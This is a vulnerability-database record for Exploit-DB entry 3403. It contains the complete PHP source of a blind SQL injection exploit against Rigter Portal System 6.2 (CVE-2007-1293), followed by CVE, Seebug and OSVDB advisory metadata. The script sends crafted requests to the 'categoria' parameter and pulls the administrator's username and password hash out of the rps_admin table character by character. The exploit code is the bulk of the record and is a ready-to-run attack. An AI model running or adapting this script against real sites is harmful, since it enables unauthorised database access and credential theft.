Rigter Portal System RPS 6.2 - Remote Blind SQL Injection Exploit

{"bulletinFamily": "exploit", "id": "EDB-ID:3403", "cvelist": ["CVE-2007-1293"], "modified": "2007-03-04T00:00:00", "lastseen": "2016-01-31T18:24:20", "edition": 1, "sourceData": "<?\n//RPS 6.2 SQL Injection Exploit\n//http://www.rps-project.com/\n\n//Need magic_quotes_gpc = Off;\n//by s0cratex\n//Contact: s0cratex[at]hotmail[dot]com\n\n//Salu2: rgod, 0pt1x 'n mechas.\n\nerror_reporting(0);\nini_set(\"max_execution_time\",0);\nini_set(\"default_socket_timeout\",5);\n\n$host = \"localhost\"; $path=\"/rps\"; $id=1;\n\necho \"RPS 6.2 SQL Injection exploit\\n-----------------------------\\n\\n\";\necho \"Username: \";\n$j=1;$result=\"\";\nwhile(!strstr($result,chr(0))){\nfor($x=0;$x<255;$x++){\n$cnx = fsockopen($host,80);\nfwrite($cnx, \"GET \".$path.\"/?x=ver_descarga&e=mostrar&categoria=-1'/**/OR/**/1=(SELECT/**/(IF((ASCII(SUBSTRING(username,\".$j.\",1))=\".$x.\"),1,0))FROM/**/rps_admin/**/WHERE/**/id=\".$id.\")/* HTTP/1.0\\r\\nHost: \".$host.\"\\r\\n\\r\\n\");\nwhile(!feof($cnx)){ if(ereg(\"Descargar\", fgets($cnx))){ $result .= chr($x);\necho chr($x); break; } }\nfclose($cnx);\nif ($x==255) {\ndie(\"\\n Try again...\");\n}\n}\n$j++;\n}\necho \"\\n\";\necho \"Password: \";\n$a=1;$result2=\"\";\nwhile(!strstr($result2,chr(0))){\nfor($i=0;$i<255;$i++){\n$cnx2 = fsockopen($host,80);\nfwrite($cnx2, \"GET \".$path.\"/?x=ver_descarga&e=mostrar&categoria=-1'/**/OR/**/1=(SELECT/**/(IF((ASCII(SUBSTRING(password,\".$a.\",1))=\".$i.\"),1,0))FROM/**/rps_admin/**/WHERE/**/id=\".$id.\")/* HTTP/1.0\\r\\nHost: \".$host.\"\\r\\n\\r\\n\");\nwhile(!feof($cnx2)){ if(ereg(\"Descargar\", fgets($cnx2))){ $result2 .=\nchr($i); echo chr($i); break; } }\nfclose($cnx2);\nif ($i==255) {\ndie(\"\\n Try again...\");\n}\n}\n$a++;\n}\necho \"\\nThe password has been encrypted with crypt() function...\\n-----------------------------\\n by s0cratex\";\n?>\n\n# milw0rm.com [2007-03-04]\n", "published": "2007-03-04T00:00:00", "href": "https://www.exploit-db.com/exploits/3403/", "osvdbidlist": ["33831"], "reporter": "s0cratex", "hash": "848c69ee100b58b3fc5441ea0c909ddcd071aa2cc64deac1932f953ec82cfe0f", "title": "Rigter Portal System RPS 6.2 - Remote Blind SQL Injection Exploit", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "Rigter Portal System (RPS) 6.2 Remote Blind SQL Injection Exploit. CVE-2007-1293. Webapps exploit for php platform", "references": [], "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/3403/", "enchantments": {"vulnersScore": 3.6}}

{"result": {"cve": [{"id": "CVE-2007-1293", "type": "cve", "title": "CVE-2007-1293", "description": "SQL injection vulnerability in Rigter Portal System (RPS) 6.2, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the categoria parameter to the top-level URI (index.php), possibly related to ver_descarga.php.", "published": "2007-03-06T19:19:00", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1293", "cvelist": ["CVE-2007-1293"], "lastseen": "2017-07-29T11:21:54"}], "seebug": [{"id": "SSV-64516", "type": "seebug", "title": "Rigter Portal System (RPS) 6.2 - Remote Blind SQL Injection Exploit", "description": "Summary: \nRigter Portal System (RPS) version 6.2 in the presence of SQL injection vulnerabilities. When magic_quotes_gpc is disabled, a remote attacker may be by means of submission to the highest-level URI(index.php)the categoria parameter, to execute arbitrary SQL commands. It may be related to ver_descarga. php related.\n", "published": "2014-07-01T00:00:00", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "href": "https://www.seebug.org/vuldb/ssvid-64516", "cvelist": ["CVE-2007-1293"], "lastseen": "2016-07-26T13:01:54"}], "osvdb": [{"id": "OSVDB:33831", "type": "osvdb", "title": "Rigter Portal System (RPS) index.php categoria Variable SQL Injection", "description": "## Technical Description\nThis vulnerability is only present when the magic_quotes_gpc PHP option is 'off'.\n## References:\n[Secunia Advisory ID:24382](https://secuniaresearch.flexerasoftware.com/advisories/24382/)\nOther Advisory URL: http://milw0rm.com/exploits/3403\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-03/0027.html\nISS X-Force ID: 32784\nFrSIRT Advisory: ADV-2007-0813\n[CVE-2007-1293](https://vulners.com/cve/CVE-2007-1293)\nBugtraq ID: 22813\n", "published": "2007-03-03T10:18:49", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "href": "https://vulners.com/osvdb/OSVDB:33831", "cvelist": ["CVE-2007-1293"], "lastseen": "2017-04-28T13:20:30"}]}}